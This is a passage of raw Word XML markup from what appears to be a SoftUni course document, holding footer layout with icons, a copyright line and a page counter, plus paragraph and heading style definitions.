                                        </pic:cNvPicPr>
                                      </pic:nvPicPr>
                                      <pic:blipFill>
                                        <a:blip r:embed="rId6"/>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drawing>
                              <wp:inline distT="0" distB="0" distL="0" distR="0">
                                <wp:extent cx="179705" cy="179705"/>
                                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                                <wp:docPr id="2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pic:cNvPicPr>
                                          <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                                        </pic:cNvPicPr>
                                      </pic:nvPicPr>
                                      <pic:blipFill>
                                        <a:blip r:embed="rId7"/>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drawing>
                              <wp:inline distT="0" distB="0" distL="0" distR="0">
                                <wp:extent cx="179705" cy="179705"/>
                                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                                <wp:docPr id="2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descr=""/>
                                        <pic:cNvPicPr>
                                          <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                                        </pic:cNvPicPr>
                                      </pic:nvPicPr>
                                      <pic:blipFill>
                                        <a:blip r:embed="rId8"/>
                                        <a:srcRect l="-154" t="-73" r="-154" b="-73"/>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drawing>
                              <wp:inline distT="0" distB="0" distL="0" distR="0">
                                <wp:extent cx="179705" cy="179705"/>
                                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                                <wp:docPr id="2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
                                        <pic:cNvPicPr>
                                          <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                                        </pic:cNvPicPr>
                                      </pic:nvPicPr>
                                      <pic:blipFill>
                                        <a:blip r:embed="rId9"/>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drawing>
                              <wp:inline distT="0" distB="0" distL="0" distR="0">
                                <wp:extent cx="179705" cy="179705"/>
                                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                                <wp:docPr id="25"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
                                        <pic:cNvPicPr>
                                          <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                                        </pic:cNvPicPr>
                                      </pic:nvPicPr>
                                      <pic:blipFill>
                                        <a:blip r:embed="rId10"/>
                                        <a:stretch>
                                          <a:fillRect/>
                                        </a:stretch>
                                      </pic:blipFill>
                                      <pic:spPr bwMode="auto">
                                        <a:xfrm>
                                          <a:off x="0" y="0"/>
                                          <a:ext cx="179705" cy="179705"/>
                                        </a:xfrm>
                                        <a:prstGeom prst="rect">
                                          <a:avLst/>
                                        </a:prstGeom>
                                      </pic:spPr>
                                    </pic:pic>
                                  </a:graphicData>
                                </a:graphic>
                              </wp:inline>
                            </w:drawing>
                          </w:r>
                        </w:p>
                      </w:txbxContent>
                    </wps:txbx>
                    <wps:bodyPr lIns="17640" rIns="17640" tIns="43200" bIns="17640">
                      <a:noAutofit/>
                    </wps:bodyPr>
                  </wps:wsp>
                </a:graphicData>
              </a:graphic>
            </wp:anchor>
          </w:drawing>
        </mc:Choice>
        <mc:Fallback>
          <w:pict>
            <v:rect id="shape_0" ID="Text Box 16" stroked="f" style="position:absolute;margin-left:109pt;margin-top:7pt;width:411.45pt;height:40.5pt" wp14:anchorId="2074F399">
              <w10:wrap type="square"/>
              <v:fill o:detectmouseclick="t" on="false"/>
              <v:stroke color="#3465a4" weight="9360" joinstyle="round" endcap="flat"/>
              <v:textbox>
                <w:txbxContent>
                  <w:p>
                    <w:pPr>
                      <w:pStyle w:val="FrameContents"/>
                      <w:spacing w:lineRule="auto" w:line="240" w:before="40" w:after="100"/>
                      <w:rPr/>
                    </w:pPr>
                    <w:bookmarkStart w:id="2" w:name="_Hlk24191091"/>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="000000"/>
                        <w:sz w:val="17"/>
                        <w:szCs w:val="17"/>
                      </w:rPr>
                      <w:t xml:space="preserve">© SoftUni – </w:t>
                    </w:r>
                    <w:hyperlink r:id="rId11">
                      <w:r>
                        <w:rPr>
                          <w:rStyle w:val="InternetLink"/>
                          <w:color w:val="0882DE"/>
                          <w:sz w:val="17"/>
                          <w:szCs w:val="17"/>
                        </w:rPr>
                        <w:t>about.softuni.bg</w:t>
                      </w:r>
                    </w:hyperlink>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="000000"/>
                        <w:sz w:val="17"/>
                        <w:szCs w:val="17"/>
                      </w:rPr>
                      <w:t>. Copyrighted document. Unauthorized copy, reproduction or use is not permitted.</w:t>
                    </w:r>
                    <w:bookmarkEnd w:id="2"/>
                  </w:p>
                  <w:p>
                    <w:pPr>
                      <w:pStyle w:val="FrameContents"/>
                      <w:spacing w:lineRule="auto" w:line="240" w:before="80" w:after="120"/>
                      <w:ind w:left="567" w:firstLine="284"/>
                      <w:rPr>
                        <w:sz w:val="18"/>
                        <w:szCs w:val="18"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr/>
                      <w:drawing>
                        <wp:inline distT="0" distB="0" distL="0" distR="0">
                          <wp:extent cx="179705" cy="179705"/>
                          <wp:effectExtent l="0" t="0" r="0" b="0"/>
                          <wp:docPr id="2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
                                  <pic:cNvPicPr>
                                    <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                                  </pic:cNvPicPr>
                                </pic:nvPicPr>
                                <pic:blipFill>
                                  <a:blip r:embed="rId2"/>
                                  <a:stretch>
                                    <a:fillRect/>
                                  </a:stretch>
                                </pic:blipFill>
                                <pic:spPr bwMode="auto">
                                  <a:xfrm>
                                    <a:off x="0" y="0"/>
                                    <a:ext cx="179705" cy="179705"/>
                                  </a:xfrm>
                                  <a:prstGeom prst="rect">
                                    <a:avLst/>
                                  </a:prstGeom>
                                </pic:spPr>
                              </pic:pic>
                            </a:graphicData>
                          </a:graphic>
                        </wp:inline>
                      </w:drawing>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="000000"/>
                        <w:sz w:val="18"/>
                        <w:szCs w:val="18"/>
                        <w:lang w:val="bg-BG"/>
                      </w:rPr>
                      <w:t xml:space="preserve">   </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr/>
                      <w:drawing>
                        <wp:inline distT="0" distB="0" distL="0" distR="0">
                          <wp:extent cx="179705" cy="179705"/>
                          <wp:effectExtent l="0" t="0" r="0" b="0"/>
                          <wp:docPr id="2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
                                  <pic:cNvPicPr>
                                    <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                                  </pic:cNvPicPr>
                                </pic:nvPicPr>
                                <pic:blipFill>
                                  <a:blip r:embed="rId3"/>
                                  <a:stretch>
                                    <a:fillRect/>
                                  </a:stretch>
                                </pic:blipFill>
                                <pic:spPr bwMode="auto">
                                  <a:xfrm>
                                    <a:off x="0" y="0"/>
                                    <a:ext cx="179705" cy="179705"/>
                                  </a:xfrm>
                                  <a:prstGeom prst="rect">
                                    <a:avLst/>
                                  </a:prstGeom>
                                </pic:spPr>
                              </pic:pic>
                            </a:graphicData>
                          </a:graphic>
                        </wp:inline>
                      </w:drawing>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="000000"/>
                        <w:sz w:val="18"/>
                        <w:szCs w:val="18"/>
                        <w:lang w:val="bg-BG"/>
                      </w:rPr>
                      <w:t xml:space="preserve">   </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr/>
                      <w:drawing>
                        <wp:inline distT="0" distB="0" distL="0" distR="0">
                          <wp:extent cx="179705" cy="179705"/>
                          <wp:effectExtent l="0" t="0" r="0" b="0"/>
                          <wp:docPr id="2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
                                  <pic:cNvPicPr>
                                    <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                                  </pic:cNvPicPr>
                                </pic:nvPicPr>
                                <pic:blipFill>
                                  <a:blip r:embed="rId4"/>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drawing>
                        <wp:inline distT="0" distB="0" distL="0" distR="0">
                          <wp:extent cx="179705" cy="179705"/>
                          <wp:effectExtent l="0" t="0" r="0" b="0"/>
                          <wp:docPr id="2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descr=""/>
                                  <pic:cNvPicPr>
                                    <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                                  </pic:cNvPicPr>
                                </pic:nvPicPr>
                                <pic:blipFill>
                                  <a:blip r:embed="rId5"/>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drawing>
                        <wp:inline distT="0" distB="0" distL="0" distR="0">
                          <wp:extent cx="179705" cy="179705"/>
                          <wp:effectExtent l="0" t="0" r="0" b="0"/>
                          <wp:docPr id="3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pic:cNvPicPr>
                                    <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                                  </pic:cNvPicPr>
                                </pic:nvPicPr>
                                <pic:blipFill>
                                  <a:blip r:embed="rId6"/>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drawing>
                        <wp:inline distT="0" distB="0" distL="0" distR="0">
                          <wp:extent cx="179705" cy="179705"/>
                          <wp:effectExtent l="0" t="0" r="0" b="0"/>
                          <wp:docPr id="3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descr=""/>
                                  <pic:cNvPicPr>
                                    <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                                  </pic:cNvPicPr>
                                </pic:nvPicPr>
                                <pic:blipFill>
                                  <a:blip r:embed="rId7"/>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drawing>
                        <wp:inline distT="0" distB="0" distL="0" distR="0">
                          <wp:extent cx="179705" cy="179705"/>
                          <wp:effectExtent l="0" t="0" r="0" b="0"/>
                          <wp:docPr id="3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descr=""/>
                                  <pic:cNvPicPr>
                                    <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                                  </pic:cNvPicPr>
                                </pic:nvPicPr>
                                <pic:blipFill>
                                  <a:blip r:embed="rId8"/>
                                  <a:srcRect l="-154" t="-73" r="-154" b="-73"/>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drawing>
                        <wp:inline distT="0" distB="0" distL="0" distR="0">
                          <wp:extent cx="179705" cy="179705"/>
                          <wp:effectExtent l="0" t="0" r="0" b="0"/>
                          <wp:docPr id="3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descr=""/>
                                  <pic:cNvPicPr>
                                    <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                                  </pic:cNvPicPr>
                                </pic:nvPicPr>
                                <pic:blipFill>
                                  <a:blip r:embed="rId9"/>
                                  <a:stretch>
                                    <a:fillRect/>
                                  </a:stretch>
                                </pic:blipFill>
                                <pic:spPr bwMode="auto">
                                  <a:xfrm>
                                    <a:off x="0" y="0"/>
                                    <a:ext cx="179705" cy="179705"/>
                                  </a:xfrm>
                                  <a:prstGeom prst="rect">
                                    <a:avLst/>
                                  </a:prstGeom>
                                </pic:spPr>
                              </pic:pic>
                            </a:graphicData>
                          </a:graphic>
                        </wp:inline>
                      </w:drawing>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="000000"/>
                        <w:sz w:val="18"/>
                        <w:szCs w:val="18"/>
                      </w:rPr>
                      <w:t xml:space="preserve">   </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr/>
                      <w:drawing>
                        <wp:inline distT="0" distB="0" distL="0" distR="0">
                          <wp:extent cx="179705" cy="179705"/>
                          <wp:effectExtent l="0" t="0" r="0" b="0"/>
                          <wp:docPr id="3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descr=""/>
                                  <pic:cNvPicPr>
                                    <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                                  </pic:cNvPicPr>
                                </pic:nvPicPr>
                                <pic:blipFill>
                                  <a:blip r:embed="rId10"/>
                                  <a:stretch>
                                    <a:fillRect/>
                                  </a:stretch>
                                </pic:blipFill>
                                <pic:spPr bwMode="auto">
                                  <a:xfrm>
                                    <a:off x="0" y="0"/>
                                    <a:ext cx="179705" cy="179705"/>
                                  </a:xfrm>
                                  <a:prstGeom prst="rect">
                                    <a:avLst/>
                                  </a:prstGeom>
                                </pic:spPr>
                              </pic:pic>
                            </a:graphicData>
                          </a:graphic>
                        </wp:inline>
                      </w:drawing>
                    </w:r>
                  </w:p>
                </w:txbxContent>
              </v:textbox>
            </v:rect>
          </w:pict>
        </mc:Fallback>
      </mc:AlternateContent>
      <mc:AlternateContent>
        <mc:Choice Requires="wps">
          <w:drawing>
            <wp:anchor behindDoc="1" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="55" wp14:anchorId="41B1E642">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="column">
                <wp:posOffset>1395095</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>356235</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="511810" cy="167005"/>
              <wp:effectExtent l="635" t="0" r="0" b="0"/>
              <wp:wrapNone/>
              <wp:docPr id="35" name="Text Box 6"/>
              <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                  <wps:wsp>
                    <wps:cNvSpPr/>
                    <wps:spPr>
                      <a:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="511200" cy="1663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0" w:after="0"/>
                            <w:rPr>
                              <w:sz w:val="17"/>
                              <w:szCs w:val="17"/>
                            </w:rPr>
                          </w:pPr>
                          <w:r>
                            <w:rPr>
                              <w:color w:val="000000"/>
                              <w:sz w:val="17"/>
                              <w:szCs w:val="17"/>
                            </w:rPr>
                            <w:t>Follow us:</w:t>
                          </w:r>
                        </w:p>
                      </w:txbxContent>
                    </wps:txbx>
                    <wps:bodyPr lIns="17640" rIns="0" tIns="0" bIns="0" anchor="ctr">
                      <a:prstTxWarp prst="textNoShape"/>
                      <a:noAutofit/>
                    </wps:bodyPr>
                  </wps:wsp>
                </a:graphicData>
              </a:graphic>
            </wp:anchor>
          </w:drawing>
        </mc:Choice>
        <mc:Fallback>
          <w:pict>
            <v:rect id="shape_0" ID="Text Box 6" stroked="f" style="position:absolute;margin-left:109.85pt;margin-top:28.05pt;width:40.2pt;height:13.05pt" wp14:anchorId="41B1E642">
              <w10:wrap type="square"/>
              <v:fill o:detectmouseclick="t" on="false"/>
              <v:stroke color="#3465a4" weight="6480" joinstyle="round" endcap="flat"/>
              <v:textbox>
                <w:txbxContent>
                  <w:p>
                    <w:pPr>
                      <w:pStyle w:val="FrameContents"/>
                      <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
                      <w:rPr>
                        <w:sz w:val="17"/>
                        <w:szCs w:val="17"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="000000"/>
                        <w:sz w:val="17"/>
                        <w:szCs w:val="17"/>
                      </w:rPr>
                      <w:t>Follow us:</w:t>
                    </w:r>
                  </w:p>
                </w:txbxContent>
              </v:textbox>
            </v:rect>
          </w:pict>
        </mc:Fallback>
      </mc:AlternateContent>
      <mc:AlternateContent>
        <mc:Choice Requires="wps">
          <w:drawing>
            <wp:anchor behindDoc="1" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="73" wp14:anchorId="60DB5C39">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="column">
                <wp:posOffset>5647055</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>342265</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="902335" cy="203835"/>
              <wp:effectExtent l="0" t="0" r="0" b="0"/>
              <wp:wrapNone/>
              <wp:docPr id="37" name="Text Box 4"/>
              <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                  <wps:wsp>
                    <wps:cNvSpPr/>
                    <wps:spPr>
                      <a:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="901800" cy="2030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80" w:after="0"/>
                            <w:jc w:val="right"/>
                            <w:rPr/>
                          </w:pPr>
                          <w:r>
                            <w:rPr>
                              <w:color w:val="000000"/>
                              <w:sz w:val="18"/>
                              <w:szCs w:val="18"/>
                            </w:rPr>
                            <w:t xml:space="preserve">Page </w:t>
                          </w:r>
                          <w:r>
                            <w:rPr>
                              <w:sz w:val="18"/>
                              <w:szCs w:val="18"/>
                            </w:rPr>
                            <w:fldChar w:fldCharType="begin"/>
                          </w:r>
                          <w:r>
                            <w:rPr>
                              <w:sz w:val="18"/>
                              <w:szCs w:val="18"/>
                            </w:rPr>
                            <w:instrText> PAGE </w:instrText>
                          </w:r>
                          <w:r>
                            <w:rPr>
                              <w:sz w:val="18"/>
                              <w:szCs w:val="18"/>
                            </w:rPr>
                            <w:fldChar w:fldCharType="separate"/>
                          </w:r>
                          <w:r>
                            <w:rPr>
                              <w:sz w:val="18"/>
                              <w:szCs w:val="18"/>
                            </w:rPr>
                            <w:t>1</w:t>
                          </w:r>
                          <w:r>
                            <w:rPr>
                              <w:sz w:val="18"/>
                              <w:szCs w:val="18"/>
                            </w:rPr>
                            <w:fldChar w:fldCharType="end"/>
                          </w:r>
                          <w:r>
                            <w:rPr>
                              <w:color w:val="000000"/>
                              <w:sz w:val="18"/>
                              <w:szCs w:val="18"/>
                            </w:rPr>
                            <w:t xml:space="preserve"> of </w:t>
                          </w:r>
                          <w:r>
                            <w:rPr>
                              <w:sz w:val="18"/>
                              <w:szCs w:val="18"/>
                            </w:rPr>
                            <w:fldChar w:fldCharType="begin"/>
                          </w:r>
                          <w:r>
                            <w:rPr>
                              <w:sz w:val="18"/>
                              <w:szCs w:val="18"/>
                            </w:rPr>
                            <w:instrText> NUMPAGES </w:instrText>
                          </w:r>
                          <w:r>
                            <w:rPr>
                              <w:sz w:val="18"/>
                              <w:szCs w:val="18"/>
                            </w:rPr>
                            <w:fldChar w:fldCharType="separate"/>
                          </w:r>
                          <w:r>
                            <w:rPr>
                              <w:sz w:val="18"/>
                              <w:szCs w:val="18"/>
                            </w:rPr>
                            <w:t>18</w:t>
                          </w:r>
                          <w:r>
                            <w:rPr>
                              <w:sz w:val="18"/>
                              <w:szCs w:val="18"/>
                            </w:rPr>
                            <w:fldChar w:fldCharType="end"/>
                          </w:r>
                        </w:p>
                      </w:txbxContent>
                    </wps:txbx>
                    <wps:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="ctr">
                      <a:prstTxWarp prst="textNoShape"/>
                      <a:noAutofit/>
                    </wps:bodyPr>
                  </wps:wsp>
                </a:graphicData>
              </a:graphic>
            </wp:anchor>
          </w:drawing>
        </mc:Choice>
        <mc:Fallback>
          <w:pict>
            <v:rect id="shape_0" ID="Text Box 4" stroked="f" style="position:absolute;margin-left:444.65pt;margin-top:26.95pt;width:70.95pt;height:15.95pt" wp14:anchorId="60DB5C39">
              <w10:wrap type="square"/>
              <v:fill o:detectmouseclick="t" on="false"/>
              <v:stroke color="#3465a4" weight="6480" joinstyle="round" endcap="flat"/>
              <v:textbox>
                <w:txbxContent>
                  <w:p>
                    <w:pPr>
                      <w:pStyle w:val="FrameContents"/>
                      <w:spacing w:lineRule="auto" w:line="240" w:before="80" w:after="0"/>
                      <w:jc w:val="right"/>
                      <w:rPr/>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="000000"/>
                        <w:sz w:val="18"/>
                        <w:szCs w:val="18"/>
                      </w:rPr>
                      <w:t xml:space="preserve">Page </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:sz w:val="18"/>
                        <w:szCs w:val="18"/>
                      </w:rPr>
                      <w:fldChar w:fldCharType="begin"/>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:sz w:val="18"/>
                        <w:szCs w:val="18"/>
                      </w:rPr>
                      <w:instrText> PAGE </w:instrText>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:sz w:val="18"/>
                        <w:szCs w:val="18"/>
                      </w:rPr>
                      <w:fldChar w:fldCharType="separate"/>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:sz w:val="18"/>
                        <w:szCs w:val="18"/>
                      </w:rPr>
                      <w:t>1</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:sz w:val="18"/>
                        <w:szCs w:val="18"/>
                      </w:rPr>
                      <w:fldChar w:fldCharType="end"/>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="000000"/>
                        <w:sz w:val="18"/>
                        <w:szCs w:val="18"/>
                      </w:rPr>
                      <w:t xml:space="preserve"> of </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:sz w:val="18"/>
                        <w:szCs w:val="18"/>
                      </w:rPr>
                      <w:fldChar w:fldCharType="begin"/>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:sz w:val="18"/>
                        <w:szCs w:val="18"/>
                      </w:rPr>
                      <w:instrText> NUMPAGES </w:instrText>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:sz w:val="18"/>
                        <w:szCs w:val="18"/>
                      </w:rPr>
                      <w:fldChar w:fldCharType="separate"/>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:sz w:val="18"/>
                        <w:szCs w:val="18"/>
                      </w:rPr>
                      <w:t>18</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:sz w:val="18"/>
                        <w:szCs w:val="18"/>
                      </w:rPr>
                      <w:fldChar w:fldCharType="end"/>
                    </w:r>
                  </w:p>
                </w:txbxContent>
              </v:textbox>
            </v:rect>
          </w:pict>
        </mc:Fallback>
      </mc:AlternateContent>
      <w:drawing>
        <wp:anchor behindDoc="1" distT="0" distB="0" distL="114300" distR="114300" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="91">
          <wp:simplePos x="0" y="0"/>
          <wp:positionH relativeFrom="column">
            <wp:posOffset>-10795</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>140970</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="1252855" cy="432435"/>
          <wp:effectExtent l="0" t="0" r="0" b="0"/>
          <wp:wrapSquare wrapText="bothSides"/>
          <wp:docPr id="3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descr=""/>
                  <pic:cNvPicPr>
                    <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                  </pic:cNvPicPr>
                </pic:nvPicPr>
                <pic:blipFill>
                  <a:blip r:embed="rId12"/>
                  <a:stretch>
                    <a:fillRect/>
                  </a:stretch>
                </pic:blipFill>
                <pic:spPr bwMode="auto">
                  <a:xfrm>
                    <a:off x="0" y="0"/>
                    <a:ext cx="1252855" cy="43243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80" w:after="0"/>
      <w:ind w:hanging="1134"/>
      <w:rPr>
        <w:rStyle w:val="Normaltextrun"/>
        <w:rFonts w:cs="Calibri"/>
        <w:u w:val="single"/>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12"/>
        <w:b/>
        <w:szCs w:val="24"/>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w:zoom w:percent="110"/>
  <w:defaultTabStop w:val="720"/>
  <w:autoHyphenation w:val="fals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063e1"/>
    <w:pPr>
      <w:widowControl/>
      <w:suppressAutoHyphens w:val="true"/>
      <w:bidi w:val="0"/>
      <w:spacing w:lineRule="auto" w:line="276" w:before="80" w:after="12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1"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="009254b7"/>
    <w:pPr>
      <w:keepNext w:val="true"/>
      <w:keepLines/>
      <w:spacing w:before="200" w:after="40"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="" w:cs="" w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia"/>
      <w:b/>
      <w:color w:val="642D08"/>
      <w:sz w:val="40"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="Heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="2"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="006e55b4"/>
    <w:pPr>
      <w:keepNext w:val="true"/>
      <w:keepLines/>
      <w:spacing w:before="200" w:after="40"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="" w:cs="" w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="7C380A"/>
      <w:sz w:val="36"/>
      <w:szCs w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="Heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="3"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="008c5930"/>
    <w:pPr>
      <w:keepNext w:val="true"/>
      <w:keepLines/>
      <w:spacing w:before="120" w:after="40"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="" w:cs="" w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia"/>
      <w:b/>
      <w:color w:val="8F400B"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading4">
    <w:name w:val="Heading 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="4"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="008c5930"/>
    <w:pPr>
      <w:keepNext w:val="true"/>
      <w:keepLines/>
      <w:spacing w:before="120" w:after="40"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="" w:cs="" w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia"/>
      <w:b/>
      <w:iCs/>
      <w:color w:val="A34A0D"/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading5">
    <w:name w:val="Heading 5"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="5"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="008c5930"/>
    <w:pPr>
      <w:keepNext w:val="true"/>
      <w:keepLines/>
      <w:spacing w:before="80" w:after="0"/>
      <w:outlineLvl w:val="4"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="" w:cs="" w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia"/>
      <w:b/>
      <w:color w:val="B2500E"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="DefaultParagraphFont" w:default="1">
    <w:name w:val="Default Paragraph Font"/>
    <w:uiPriority w:val="1"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rPr/>
  </w:style>
  <w:style w:type="character" w:styleId="Style9" w:customStyle="1">
    <w:name w:val="Горен колонтитул Знак"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Header"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rsid w:val="008068a2"/>
    <w:rPr/>
  </w:style>
  <w:style w:type="character" w:styleId="Style10" w:customStyle="1">
    <w:name w:val="Долен колонтитул Знак"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Footer"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rsid w:val="008068a2"/>
    <w:rPr/>
  </w:style>
  <w:style w:type="character" w:styleId="Style11" w:customStyle="1">
    <w:name w:val="Изнесен текст Знак"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="BalloonText"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:rsid w:val="00564d7b"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="InternetLink" w:customStyle="1">
    <w:name w:val="Internet Link"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005054c7"/>
    <w:rPr>
      <w:color w:val="0000FF" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="1" w:customStyle="1">
    <w:name w:val="Заглавие 1 Знак"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading1"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="009254b7"/>
    <w:rPr>
      <w:rFonts w:eastAsia="" w:cs="" w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia"/>
      <w:b/>
      <w:color w:val="642D08"/>
      <w:sz w:val="40"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="2" w:customStyle="1">
    <w:name w:val="Заглавие 2 Знак"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading2"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="006e55b4"/>
    <w:rPr>
      <w:rFonts w:eastAsia="" w:cs="" w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="7C380A"/>
      <w:sz w:val="36"/>
      <w:szCs w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Strong">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="00524789"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="3" w:customStyle="1">
    <w:name w:val="Заглавие 3 Знак"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading3"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="008c5930"/>
    <w:rPr>
      <w:rFonts w:eastAsia="" w:cs="" w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia"/>
      <w:b/>
      <w:color w:val="8F400B"/>
